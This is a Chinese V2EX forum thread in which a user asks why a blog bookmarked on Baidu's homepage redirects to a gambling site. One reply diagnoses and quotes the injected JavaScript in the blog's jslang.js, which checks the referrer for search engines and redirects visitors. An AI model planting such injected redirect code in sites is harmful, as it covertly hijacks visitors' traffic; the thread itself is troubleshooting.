百度首页 [我的关注] 保存的网址被劫持

添加的百度首页-我的关注的特定网址，打开被劫持到 https://www.899375.com/1/index.html
网站是苹果 fans 博客 https://www.mac52ipod.cn/
经测试电信宽带，联通热点均可复现
这种应该怎么排查？

TwoBall

2021-07-12 19:04:13 +08:00

https://s1.ax1x.com/2020/05/09/YMhjxO.png
找不到图床了盗个图

Shing

2021-07-12 19:07:55 +08:00

为了测试你这个，我特意注册了百度帐号

测试结果：没发现有劫持。

是不是这个博客本身就 dns 污染被劫持呢？跟百度应该没多大关系吧？

hellhyzcy66

2021-07-12 19:12:55 +08:00

我宁愿相信是百度干的，资本家

TwoBall

2021-07-13 00:01:30 +08:00

@Shing 奇怪的就是我在百度首页点击这个网址，跳转到博彩网站。在 V2EX 本页点击就能打开

@hellhyzcy66 我觉得你说的对

nuk

2021-07-13 02:45:47 +08:00

确实是网页做了劫持
https://www.mac52ipod.cn/lang/zh-cn/jslang.js?jsver=2.1.2.0312.0
里面这样
document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://www.899375.com/1/index.html\";");
document.writeln("</script>");document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://www.899375.com/1/index.html\";");
document.writeln("</script>");

TwoBall

2021-07-13 10:22:42 +08:00

@nuk #5 强

jeffson

2021-07-13 23:02:18 +08:00

学习了

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/789087

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.